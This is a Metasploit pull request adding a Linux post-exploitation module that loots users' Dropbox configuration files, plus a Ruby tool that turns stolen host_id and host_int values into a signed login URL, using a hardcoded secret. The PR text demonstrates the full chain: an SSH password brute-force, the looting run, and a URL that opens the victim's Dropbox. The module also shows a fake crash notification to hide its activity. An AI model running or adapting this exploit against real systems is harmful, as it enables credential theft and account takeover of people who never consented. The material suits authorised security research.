### PR TITLE
Long promised post module for hijacking Dropbox accounts

### DIFF
--- a/modules/post/linux/gather/dropbox_creds.rb
+++ b/modules/post/linux/gather/dropbox_creds.rb
@@ -1,0 +1,124 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/unix'
+require 'json'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Post::Unix
+
+	def initialize(info={})
+		super( update_info(info,
+			'Name'           => 'Multi Gather Dropbox Credentials Collection',
+			'Description'    => %q{
+					This module will either collect the contents of user's .dropbox directory on the targeted machine *OR* will collect Dropbox's logs which have "credentials". This module works for at least Dropbox versions <= 1.6.17 .
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => ['Dhiru Kholia <dhiru[at]openwall.com>'],
+			'Platform'       => ['linux'],
+			'SessionTypes'   => ['shell']
+		))
+	end
+
+	def run
+		print_status("Ensure your time is properly synced!")
+		print_status("Finding .dropbox directories")
+		paths = enum_user_directories.map {|d| d + "/.dropbox"}
+		paths = paths.select { |d| directory?(d) }
+
+		if paths.nil? or paths.empty?
+			print_error("No users found with a .dropbox directory")
+			return
+		end
+
+		download_loot(paths)
+	end
+
+	def download_loot(paths)
+		print_status("Looting #{paths.count} directories")
+		paths.each do |path|
+			path.chomp!
+			sep = "/"
+			host_int = nil
+			host_id = nil
+			pwd = session.shell_command("pwd").chomp
+			if pwd.nil? or pwd.empty?
+				print_error("Session died?")
+				return
+			end
+			session.shell_command("rm /tmp/dblog; killall dropboxd; killall dropbox")
+			files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
+			dropboxd_path = session.shell_command("which dropboxd").chomp
+			if dropboxd_path.nil? or dropboxd_path.empty?
+				print_error("Dropbox daemon path not found!")
+			else
+				session.shell_command("export DBDEV=a2y6shya; dropboxd &> /tmp/dblog &").chomp
+				sleep(16)
+				session.shell_command("killall dropboxd; killall dropbox")
+				session.shell_command("notify-send Dropbox has crashed unexpectedly!")
+				data = read_file("/tmp/dblog")
+				session.shell_command("rm /tmp/dblog")
+				if data.nil? or data.empty?
+					print_error("No data in log file!")
+				else
+					data.each_line do |line|
+						mo = line.match /host_int':\ (\d+)/
+						if not mo.nil?
+							host_int = mo[1]
+						end
+						mo = line.match /host_id':\ u'(.+)'/
+						if not mo.nil?
+							host_id = mo[1]
+						end
+					end
+
+					if not host_id.nil? and not host_int.nil?
+						data = JSON.dump([host_id, host_int])
+						loot_path = store_loot("dropbox.jack", "text/plain", session, data,
+							"dropbox_jack", "Dropbox jack info")
+						print_good("File stored in: #{loot_path.to_s}")
+						# we don't need contents of .dropbox in this case
+						# but it is probably wise to fetch them still.
+					end
+				end
+			end
+
+			# We need to fetch the contents of .dropbox in this case!
+			# In addtion, storing "path" is critical
+			loot_path = store_loot("dropbox.path", "text/plain", session, path,
+			       "dropbox_path}", "Dropbox path info")
+			print_good("File stored in: #{loot_path.to_s}")
+
+			files.each do |file|
+				if file =~ /hostkeys/ or file =~ /config.dbx/i or file =~ /cookies\.sqlite/
+					print "good"
+				end
+
+				target = "#{path}#{sep}#{file}"
+				if directory?(target)
+					next
+				end
+				print_status("Downloading #{path}#{sep}#{file} -> #{file}")
+				data = read_file(target)
+				file = file.split(sep).last
+				type = file.gsub(/\.dropbox.*/, "").gsub(/gpg\./, "")
+				loot_path = store_loot("dropbox.#{type}", "text/plain", session, data,
+					"dropbox_#{file}", "Dropbox #{file} File")
+				print_good("File stored in: #{loot_path.to_s}")
+			end
+
+		end
+	end
+
+end

--- a/modules/post/linux/gather/dropbox_creds.rb
+++ b/modules/post/linux/gather/dropbox_creds.rb
@@ -101,10 +101,6 @@ class Metasploit3 < Msf::Post
 			print_good("File stored in: #{loot_path.to_s}")
 
 			files.each do |file|
-				if file =~ /hostkeys/ or file =~ /config.dbx/i or file =~ /cookies\.sqlite/
-					print "good"
-				end
-
 				target = "#{path}#{sep}#{file}"
 				if directory?(target)
 					next

--- a/tools/dbjack.rb
+++ b/tools/dbjack.rb
@@ -1,0 +1,26 @@
+#!/usr/bin/env ruby
+
+# 1. host_id and host_int can captured from DEBUG logs *OR*
+#    host_id can be extracted from ~/.dropbox/config.dbx and
+#    host_int can be "sniffed" from Dropbox LAN sync traffic
+# 2. export DBDEV=a2y6shya
+# 3. Restart dropboxd and capture its output
+
+require 'digest/sha1'
+require 'json'
+
+if ARGV.length < 1
+	$stderr.puts "Usage: " + $0 + " <dropbox_jack.txt> file"
+	exit -1
+end
+
+data = open(ARGV[0], "r").read()
+
+host_id, host_int = JSON.parse(data)
+
+now = Time.now.to_i.to_s
+secret = host_id + 'sKeevie4jeeVie9bEen5baRFin9' + now
+digest = Digest::SHA1.hexdigest secret
+url = "https://www.dropbox.com/tray_login?i=" + host_int.to_s + "&t=" + now + "&v=" + digest + "&url=home&cl=en_US"
+
+puts url


### PR DESCRIPTION
Hi,

This post module is currently messy and I am opening a pull request primarily to get feedback.
## Usage:
- Setup demo

```
✗ cat my.rc 
use auxiliary/scanner/ssh/ssh_login
set PASSWORD test
set RHOSTS 127.0.0.1
set USERNAME test
set ExitOnSession false
exploit
use post/linux/gather/dropbox_creds
set SESSION 1
exploit
```
- Launch demo

```
✗ ./msfconsole -r my.rc                    
..
[*] Processing my.rc for ERB directives.
...
[*] 127.0.0.1:22 SSH - Starting bruteforce
...
[*] Command shell session 1 opened (127.0.0.1:47906 -> 127.0.0.1:22) at 2013-02-17 20:24:18 +0530
[+] 127.0.0.1:22 SSH - [2/2] - Success: 'test':'test' 'uid=1001(test) gid=100(users) groups=100(users) Linux somebox 3.7.2-1-ARCH #1 SMP PREEMPT Fri Jan 11 20:38:55 CET 2013 x86_64 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (my.rc)> use post/linux/gather/dropbox_creds
resource (my.rc)> set SESSION 1
SESSION => 1
resource (my.rc)> exploit
[*] Ensure your time is properly synced!
[*] Finding .dropbox directories
[*] Looting 1 directories
[+] File stored in: /home/user/.msf4/loot/20130217202524_default_127.0.0.1_dropbox.jack_442359.txt
...
[*] Downloading /home/test/.dropbox/photo.dbx -> photo.dbx
[+] File stored in: /home/user/.msf4/loot/20130217202536_default_127.0.0.1_dropbox.photo.db_096000.txt
[*] Downloading /home/test/.dropbox/sigstore.dbx -> sigstore.dbx
[+] File stored in: /home/user/.msf4/loot/20130217202537_default_127.0.0.1_dropbox.sigstore_934520.txt
[*] Downloading /home/test/.dropbox/unlink.db -> unlink.db
[+] File stored in: /home/user/.msf4/loot/20130217202538_default_127.0.0.1_dropbox.unlink.d_726083.txt
[*] Post module execution completed
```
- Having fun

```
$ ./tools/dbjack.rb /home/user/.msf4/loot/20130217202524_default_127.0.0.1_dropbox.jack_442359.txt ; 

https://www.dropbox.com/tray_login?i=487148435&t=1361113826&v=d7b81e770f4a5724bf92430eb598dadd86877367&url=home&cl=en_US

```

Clicking on the output of dbjack.rb gives us access to user's Dropbox.

![dropbox_creds_demo](https://f.cloud.github.com/assets/79528/165059/aa468da6-7914-11e2-8773-ad61a6fa928a.png)

There are other (longer / cumbersome) ways to hijack Dropbox accounts.
